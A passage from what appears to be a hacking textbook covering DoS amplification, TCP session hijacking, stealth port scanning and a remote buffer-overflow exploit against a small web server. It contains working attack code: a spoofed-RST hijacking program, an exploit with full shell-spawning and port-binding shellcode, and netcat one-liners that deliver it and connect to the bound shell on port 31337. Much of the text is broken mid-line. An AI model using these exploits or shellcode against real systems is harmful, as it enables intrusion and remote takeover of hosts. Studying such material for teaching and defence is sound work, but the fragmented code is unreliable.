communication to the broadcast address and has a relatively high number of
active hosts
...
The amplifier will broadcast these packets to all the hosts on
the amplification network, which will then send corresponding ICMP echo reply
packets to the spoofed source address (i
...
, to the victim's machine)
...
This attack can be done
with both ICMP packets and UDP echo packets
...

Figure 0x400-9
...
Since
bandwidth consumption is the goal of a flooding DoS attack, the more bandwidth
the attacker is able to work with, the more damage they can do
...
Systems installed with such software are commonly referred to as bots and
make up what is known as a botnet
...
The attacker uses some sort of a controlling
program, and all of the bots simultaneously attack the victim with some form of
flooding DoS attack
...

TCP/IP Hijacking
TCP/IP hijacking is a clever technique that uses spoofed packets to take over a
connection between a victim and a host machine
...

A one-time password can be used to authenticate once and only once, which
means that sniffing the authentication is useless for the attacker
...
By sniffing the local network segment, all of the details of open TCP
connections can be pulled from the headers
...
This sequence number is incremented
with each packet sent to ensure that packets are received in the correct order
...
Then the attacker sends a spoofed packet from the victim's IP address
to the host machine, using the sniffed sequence number to provide the proper
acknowledgment number, as shown here
...

The host machine will receive the spoofed packet with the correct
acknowledgment number and will have no reason to believe it didn't come from
the victim machine
...
If the source is spoofed and the acknowledgment number is
correct, the receiving side will believe that the source actually sent the reset
packet, and the connection will be reset
...
At a high level, it would
sniff using libpcap, then inject RST packets using libnet
...
Many other programs that use libpcap also don't need to look at every single
packet, so libpcap provides a way to tell the kernel to only send certain packets
that match a filter
...
For example, the filter rule to filter for a destination IP of
192
...
42
...
168
...
88"
...
The
tcpdump program uses BPFs to filter what it captures; it also provides a mode to
dump the filter program
...
168
...
88"
(000) ldh [12]
(001) jeq #0x800 jt 2 jf 4
(002) ld [30]
(003) jeq #0xc0a82a58 jt 8 jf 9
(004) jeq #0x806 jt 6 jf 5
(005) jeq #0x8035 jt 6 jf 9
(006) ld [38]
(007) jeq #0xc0a82a58 jt 8 jf 9
(008) ret #96
(009) ret #0
reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192
...
42
...

Filtering for established connections is a bit more complicated
...
The TCP
flags are found in the 13th octet of the TCP header
...
This
means that if the ACK flag is turned on, the 13th octet would be 00010000 in
binary, which is 16 in decimal
...

In order to create a filter that matches when the ACK flag is turned on without
caring about any of the other bits, the bitwise AND operator is used
...
This means that a filter of tcp[13] & 16 == 16 will match
the packets where the ACK flag is turned on, regardless of the state of the
remaining flags
...
This is easier to read but still provides the same
result
...

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host 192
...
42
...
567378 IP 192
...
42
...
40238 > 192
...
42
...
22:
...
770276 IP 192
...
42
...
40238 > 192
...
42
...
22:
...
770322 IP 192
...
42
...
40238 > 192
...
42
...
22: P 0:20(20) ack 22 win 92

10:19:47
...
168
...
72
...
168
...
88
...
918866 IP 192
...
42
...
40238 > 192
...
42
...
22: P 732:756(24) ack 766 win 115

A similar rule is used in the following program to filter the packets libpcap sniffs
...
This program will be explained as it's listed
...
c
#include ...
h>
#include "hacking
...
libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
if(critical_libnet_data
...
-- this program must run as root
...
packet));
if (critical_libnet_data
...
\n");
libnet_seed_prand();
set_packet_filter(pcap_handle, (struct in_addr *)&target_ip);
printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);
pcap_close(pcap_handle);
}

The majority of this program should make sense to you
...
libnet is used to open a raw socket interface and to allocate packet
memory
...
The final argument to the pcap_loop() call is a user
pointer, which is passed directly to the callback function
...
Also, the snap length value used in
pcap_open_live() has been reduced from 4096 to 128, since the information
needed from the packet is just in the headers
...
The sprintf() function is just a
printf() that prints to a string
...

   IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
   TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_IP_H); // TCP header follows the IP header

   printf("resetting TCP connection from %s:%d ",
         inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
   printf("<---> %s:%d\n",
         inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));

   libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header
      IPTOS_LOWDELAY,                 // IP tos
      libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
      0,                              // Frag stuff
      libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
      IPPROTO_TCP,                    // Transport protocol
      *((u_long *)&(IPhdr->ip_dst)),  // Source IP (pretend we are dst)
      *((u_long *)&(IPhdr->ip_src)),  // Destination IP (send back to src)
      NULL,                           // Payload (none)
      0,                              // Payload length
      passed->packet);                // Packet header memory

   libnet_build_tcp(htons(TCPhdr->th_dport), // Source TCP port (pretend we are dst)
      htons(TCPhdr->th_sport),        // Destination TCP port (send back to src)
      htonl(TCPhdr->th_ack),          // Sequence number (use previous ack)
      libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
      TH_RST,                         // Control flags (RST flag set only)
      libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
      0,                              // Urgent pointer
      NULL,                           // Payload (none)
      0,                              // Payload length
      (passed->packet) + LIBNET_IP_H);// Packet header memory

   if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

   bcount = libnet_write_ip(passed->libnet_handle, passed->packet,
                            LIBNET_IP_H+LIBNET_TCP_H);
   if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
      libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written
...
First, the critical libnet data is
retrieved, and pointers to the IP and TCP headers are set using the structures
included with libnet
...
h,
but the libnet structures are already there and compensate for the host's byte
ordering
...
The sniffed acknowledgment number is used as the spoofed
packet's sequence number, since that is what is expected
...
c -lnet -lpcap
reader@hacking:~/booksrc $ sudo
...
168
...
88
DEBUG: filter string is 'tcp[tcpflags] & tcp-ack != 0 and dst host 192
...
42
...
168
...
88 on eth0
resetting TCP connection from 192
...
42
...
168
...
88:22

Continued Hijacking
The spoofed packet doesn't need to be an RST packet
...
The host machine receives the
spoofed packet, increments the sequence number, and responds to the victim's IP
...
And since the victim's machine ignored the host machine's
response packet, the victim's sequence number count is off
...
In this case, both legitimate
sides of the connection have incorrect sequence numbers, resulting in a
desynchronized state
...
This lets the
attacker continue communicating with the host machine while the victim's
connection hangs
...
Since most services run on standard, documented ports, this
information can be used to determine which services are running
...
While this is effective, it's also noisy and detectable
...

To avoid this, several clever techniques have been invented
...
This tool has become one of the most popular
open source port-scanning tools
...
This is because it doesn't
actually open a full TCP connection
...
A SYN scan doesn't complete the handshake, so a full connection
is never opened
...
If a SYN/ACK packet is received in response, that port must be
accepting connections
...

Using nmap, a SYN scan can be performed using the command-line option -sS
...

reader@hacking:~/booksrc $ sudo nmap -sS 192
...
42
...
20 ( http://insecure
...
168
...
72:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap finished: 1 IP address (1 host up) scanned in 0
...
So yet another collection of techniques for stealth port scanning
evolved: FIN, X-mas, and Null scans
...
If a port is listening, these packets just
get ignored
...
This difference can be used to
detect which ports are accepting connections, without actually opening any
connections
...
While these types of scans
are stealthier, they can also be unreliable
...

Using nmap, FIN, X-mas, and Null scans can be performed using the command-line options -sF, -sX, and -sN, respectively
...
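
How a scanner interprets the reply to a single probe can be summarized in a small decision function. This is a simplified sketch with hypothetical names (classify_probe and the two enums); it is not how nmap is implemented, and it ignores retransmissions and ICMP errors.

```c
#include <assert.h>
#include <stdint.h>

#define TCP_FLAG_SYN 0x02
#define TCP_FLAG_RST 0x04
#define TCP_FLAG_ACK 0x10

enum port_state { STATE_OPEN, STATE_CLOSED, STATE_OPEN_OR_FILTERED, STATE_UNKNOWN };
enum scan_type  { SCAN_SYN, SCAN_FIN_XMAS_NULL };

/* Interpret the reply to one probe. got_reply is 0 when nothing came back;
 * otherwise reply_flags holds the TCP flags octet of the reply. */
enum port_state classify_probe(enum scan_type type, int got_reply,
                               uint8_t reply_flags)
{
    assert(type == SCAN_SYN || type == SCAN_FIN_XMAS_NULL);

    /* An RST means the port is closed for either kind of scan. */
    if (got_reply && (reply_flags & TCP_FLAG_RST))
        return STATE_CLOSED;

    if (type == SCAN_SYN) {
        /* A SYN/ACK means something is accepting connections. */
        if (got_reply &&
            (reply_flags & (TCP_FLAG_SYN | TCP_FLAG_ACK)) ==
                (TCP_FLAG_SYN | TCP_FLAG_ACK))
            return STATE_OPEN;
        return STATE_UNKNOWN;
    }

    /* FIN, X-mas, and Null probes are ignored by listening ports, so
     * silence is the signal. It cannot be told apart from a filtered port. */
    return got_reply ? STATE_UNKNOWN : STATE_OPEN_OR_FILTERED;
}
```

The last branch shows why these scans can be unreliable: a dropped probe looks exactly like an open port.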

Spoofing Decoys
Another way to avoid detection is to hide among several decoys
...
The responses from the spoofed connections aren't
needed, since they are simply misleads
...

Decoys can be specified in nmap with the -D command-line option
...
168
...
72, using 192
...
42
...
168
...
11 as decoys
...
168
...
10,192
...
42
...
168
...
72

Idle Scanning
Idle scanning is a way to scan a target using spoofed packets from an idle host, by
observing changes in the idle host
...
IP IDs are meant to be unique per packet per
session, and they are commonly incremented by a fixed amount
...
Newer operating systems, such as the recent
Linux kernel, OpenBSD, and Windows Vista, randomize the IP ID, but older
operating systems and hardware (such as printers) typically do not
...
By repeating this process a few more times, the increment applied to
the IP ID with each packet can be determined
...
One of two things will happen, depending on whether
that port on the victim machine is listening:
If that port is listening, a SYN/ACK packet will be sent back to the idle host
...

If that port isn't listening, the target machine doesn't send a SYN/ACK packet
back to the idle host, so the idle host doesn't respond
...
If it has only incremented by one interval, no other
packets were sent out by the idle host between the two checks
...
If the IP ID has incremented by two
intervals, one packet, presumably an RST packet, was sent out by the idle
machine between the checks
...
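
The inference step can be written as a short function. This is a minimal sketch under the assumptions stated above: the idle host increments its IP ID by a fixed, known amount and sends no unrelated traffic between the two checks. The names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

enum idle_result { IDLE_PORT_CLOSED, IDLE_PORT_OPEN, IDLE_INCONCLUSIVE };

/* Compare the idle host's IP ID before and after the spoofed SYN was sent
 * to the target. increment is the per-packet step measured beforehand. */
enum idle_result idle_scan_infer(uint16_t id_before, uint16_t id_after,
                                 uint16_t increment)
{
    uint16_t delta;

    assert(increment != 0);
    delta = (uint16_t)(id_after - id_before);   /* wraps modulo 2^16 */

    if (delta == increment)
        return IDLE_PORT_CLOSED;   /* only the reply to our own check was sent */
    if (delta == (uint16_t)(2 * increment))
        return IDLE_PORT_OPEN;     /* one extra packet, presumably the RST */
    return IDLE_INCONCLUSIVE;      /* the idle host was not actually idle */
}
```

The 16-bit subtraction handles the case where the IP ID wraps around between the two checks, for example from 65535 to 1.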

The steps are illustrated on the next page for both possible outcomes
...
If there is light
traffic on the idle host, multiple packets can be sent for each port
...
Even if there is light traffic, such as one or two
non–scan-related packets sent by the idle host, this difference is large enough that
it can still be detected
...

After finding a suitable idle host, this type of scanning can be done with nmap
using the -sI command-line option followed by the idle host's address:
reader@hacking:~/booksrc $ sudo nmap -sI idlehost
...
168
...
7

Figure 0x400-11
...
Knowing
what ports are open allows an attacker to determine which services can be
attacked
...
While writing this chapter, I wondered if it is
possible to prevent port scans before they actually happen
...

First of all, the FIN, Null, and X-mas scans can be prevented by a simple kernel
modification
...
The following output uses grep to find the kernel code responsible for
sending reset packets
...
*send_reset" /usr/src/linux/net/ipv4/
tcp_ipv4
...
th;
550- struct {
551- struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553- __be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555- } rep;
556- struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558- struct tcp_md5sig_key *key;
559-#endif
560 return; // Modification: Never send RST, always return
...
*/

562- if (th->rst)
563- return;
564-
565- if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566- return;
567-
reader@hacking:~/booksrc $

By adding the return command (shown above in bold), the tcp_v4_send_reset()
kernel function will simply return instead of doing anything
...

FIN Scan Before the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

FIN Scan After the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

This works fine for scans that rely on RST packets, but preventing information
leakage with SYN scans and full-connect scans is a bit more difficult
...
But if all of the closed ports also responded with SYN/ACK
packets, the amount of useful information an attacker could retrieve from port
scans would be minimized
...
Ideally, this should all be done
without using a TCP stack
...
It's a
modification of the rst_hijack
...
The callback function spoofs a
legitimate looking SYN/ACK response to any SYN packet that makes it through
the BPF
...

shroud
...
h>
#include ...
h"
#define MAX_EXISTING_PORTS 30
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;
char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network, i;
struct data_pass critical_libnet_data;
u_short existing_ports[MAX_EXISTING_PORTS];
if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
if(argc > 2)
printf("Limited to tracking %d existing ports
...
]\n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
for(i=2; i < argc; i++)
existing_ports[i-2] = (u_short) atoi(argv[i]);
existing_ports[argc-2] = 0;
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
");
printf("bing!\n");
}

There are a few tricky parts in the code above, but you should be able to follow all
of it
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud
...
/shroud 192
...
42
...
168
...
72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'

While shroud is running, any port scanning attempts will show every port to be
open
...
168
...
189
Starting nmap V
...
00 ( www
...
org/nmap/ )
Interesting ports on (192
...
0
...
A dedicated attacker could simply telnet to every port to check
the banners, but this technique could easily be expanded to spoof banners also
...
You've seen for yourself how crazy some of the typecasts can
get
...
And since many network programs need
to run as root, these little mistakes can become critical vulnerabilities
...
Did you notice it?

Reach Out and Hack Someone
From hacking-network
...
It will receive from the socket until the EOL byte
* sequence is seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byte
...

}

The recv_line() function in hacking-network
...
This means received bytes can overflow if they
exceed the dest_buffer size
...
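
To make the missing length check concrete, here is a minimal sketch of a bounded line reader. The name recv_line_bounded() and the dest_size parameter are hypothetical and not part of the hacking-network header; the point is only that the loop stops writing once the destination buffer is full.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

#define EOL "\r\n"   /* End-of-line byte sequence */
#define EOL_SIZE 2

/* Hypothetical bounded line reader: receives one byte at a time until the
 * EOL sequence is seen, but never writes more than dest_size bytes.
 * Returns the line length without the EOL bytes, or -1 on error, on a
 * closed connection, or when the line does not fit in the buffer. */
int recv_line_bounded(int sockfd, unsigned char *dest_buffer, size_t dest_size) {
    size_t used = 0;
    int eol_matched = 0;

    if (dest_buffer == NULL || dest_size < EOL_SIZE)
        return -1;

    while (used < dest_size) {                 /* the length limit */
        unsigned char *ptr = dest_buffer + used;
        if (recv(sockfd, ptr, 1, 0) != 1)      /* read a single byte */
            return -1;
        used++;
        if (*ptr == (unsigned char)EOL[eol_matched]) {
            eol_matched++;
            if (eol_matched == EOL_SIZE) {     /* whole terminator matched */
                dest_buffer[used - EOL_SIZE] = '\0';
                return (int)(used - EOL_SIZE);
            }
        } else {
            /* restart the match, allowing this byte to begin a new EOL */
            eol_matched = (*ptr == (unsigned char)EOL[0]) ? 1 : 0;
        }
    }
    dest_buffer[dest_size - 1] = '\0';         /* keep the buffer terminated */
    return -1;                                 /* line too long */
}
```

A caller would pass sizeof(request) along with the buffer and treat -1 as a reason to drop the connection.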

Analysis with GDB
To exploit the vulnerability in the tinyweb
...
First, we need to
know the offset from the start of a buffer we control to the stored return address
...
For example, the program
requires root privileges, so the debugger must be run as root
...
There are other slight differences that can shift memory
around in the debugger like this, creating inconsistencies that can be maddening
to track down
...

One elegant solution to this problem is to attach to the process after it's already
running
...
The source is recompiled using the -g option to include debugging symbols that GDB can apply to the running process
...
0 0
...
/tinyweb
reader 13104 0
...
0 2880 748 pts/2 R+ 20:27 0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb
...
/a
...
so
...

Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:44
(gdb) list 44
39 if (listen(sockfd, 20) == -1)
40 fatal("listening on socket");
41
42 while(1) { // Accept loop
43 sin_size = sizeof(struct sockaddr_in);
44 new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
45 if(new_sockfd == -1)
46 fatal("accepting connection");
47
48 handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53 /* This function handles the connection on the passed socket from the
54 * passed client address
...
Finally, the
56 * passed socket is closed at the end of the function
...
c, line 62
...

After attaching to the running process, a stack backtrace shows the program is
currently in main(), waiting for a connection
...
At this point,
the program's execution must be advanced by making a web request using wget
in another terminal or a browser
...

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb
...
c:62
#1 0x08048cf6 in main () at tinyweb
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
reader@hacking:~/booksrc $

At the breakpoint, the request buffer begins at 0xbffff5c0
...
Since we know how the local variables are generally laid out on the
stack, we know the request buffer is near the end of the frame
...
Since we already know the general area to look, a quick
inspection shows the stored return address is at 0xbffff7dc
...

However, there are a few bytes near the beginning of the buffer that might be
mangled by the rest of the function
...
To account for this, it's best to just avoid the
beginning of the buffer
...
This means 0xbffff688
is the target return address
...
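
The numbers above are plain pointer arithmetic, and it can help to check them. The sketch below assumes the request buffer starts at 0xbffff5c0 and the stored return address sits at 0xbffff7dc; the helper name stack_offset() is made up for this illustration.

```c
#include <stdint.h>

/* Distance in bytes from the start of a buffer to a higher stack address.
 * Hypothetical helper, used only to check the arithmetic in the text. */
uint32_t stack_offset(uint32_t buffer_start, uint32_t higher_addr) {
    return higher_addr - buffer_start;
}
```

With these inputs, stack_offset(0xbffff5c0, 0xbffff7dc) gives 540, which matches the OFFSET used by the exploit, and stack_offset(0xbffff5c0, 0xbffff688) gives 200, so the target return address lands 200 bytes into the buffer.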
It fills the exploit buffer with null bytes, so
anything written into it will automatically be null-terminated
...
This builds the NOP sled and fills the buffer up
to the return address overwrite location
...

tinyweb_exploit
...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include "hacking
...
h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540
#define RETADDR 0xbffff688
int main(int argc, char *argv[]) {
int sockfd, buflen;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];
if(argc < 2) {
printf("Usage: %s <hostname>\n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

memset(buffer, '\x90', OFFSET); // Build a NOP sled
...

strcat(buffer, "\r\n"); // Terminate the string
...

send_string(sockfd, buffer); // Send exploit buffer as an HTTP request
...
The exploit also dumps out the
bytes of the exploit buffer before it sends it
...
Here's
the output from the attacker's terminal:
reader@hacking:~/booksrc $ gcc tinyweb_exploit
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 31 c0 31 db |
...
1
...
j
...
Q
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf |
...

reader@hacking:~/booksrc $

Back on the terminal running the tinyweb program, the output shows the exploit
buffer was received and the shellcode is executed
...
Unfortunately, we aren't at the
console, so this won't do us any good
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html' 200 OK

Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:58504
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣ 1␣ 1␣␣␣ j
XQh//shh/bin␣␣S ␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣"
NOT HTTP!
sh-3
...
Since we're not at the console, shellcode is just a self-contained
program, designed to take over another program to open a shell
...

There are many different types of shellcode that can be used in different
situations (or payloads)
...

Port-Binding Shellcode
When exploiting a remote program, spawning a shell locally is pointless
...
Assuming you already have port-binding shellcode ready, using it
is simply a matter of replacing the shellcode bytes defined in the exploit
...
These
shellcode bytes are shown in the output below
...
1
...
j
...
jfXCRfhzifS
...
|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV
...
|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |
...
j
...
?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |
...
Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in
...
S
...
c program, resulting in tinyweb_exploit2
...
The new shellcode
line is shown below
...
c
char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

When this exploit is compiled and run against a host running tinyweb server, the
shellcode listens on port 31337 for a TCP connection
...
This program is netcat (nc for
short), which works like the cat program but over the network
...

The output of this exploit is shown below
...

reader@hacking:~/booksrc $ gcc tinyweb_exploit2
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 |
...

31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1
...
j
...
j
...

cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 |
...
fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV
...
Y
...
Rh//shh/bin
...
S
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

0d 0a |
...
0
...
1 31337
localhost [127
...
0
...

A program like netcat can be used for many other things
...
Using netcat and the port-binding shellcode in a file, the same exploit
can be carried out on the command line
...
\r\n"')
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣ jfX␣1␣CRj j ␣␣ ␣␣jfXC
RfhzifS␣␣j QV␣␣ ␣fCCSV␣␣ ␣fCRRV␣␣ ␣j Y␣? Iy␣␣
Rh//shh/bin␣␣R␣␣S␣␣ ␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38
...
0
...
1 80
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
The return address is found 540 bytes from the start of the buffer, so
with a 300-byte NOP sled and 92 bytes of shellcode, there are 152 bytes to the
return address overwrite
...
Finally, the
buffer is terminated with '\r\n'
...
netcat connects to the
tinyweb program and sends the buffer
...
Then, netcat is used again to connect to the shell bound on port 31337
...
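
The byte counts in this command line can be double-checked with a little arithmetic. The sled and shellcode take 300 + 92 = 392 bytes, which leaves 540 - 392 = 148 bytes before the stored return address; 38 repetitions of the 4-byte address span 152 bytes, so the last repetition is the one that lands on it. The function below is only a sketch of that check, and its name and parameters are invented for this example.

```c
#include <stddef.h>

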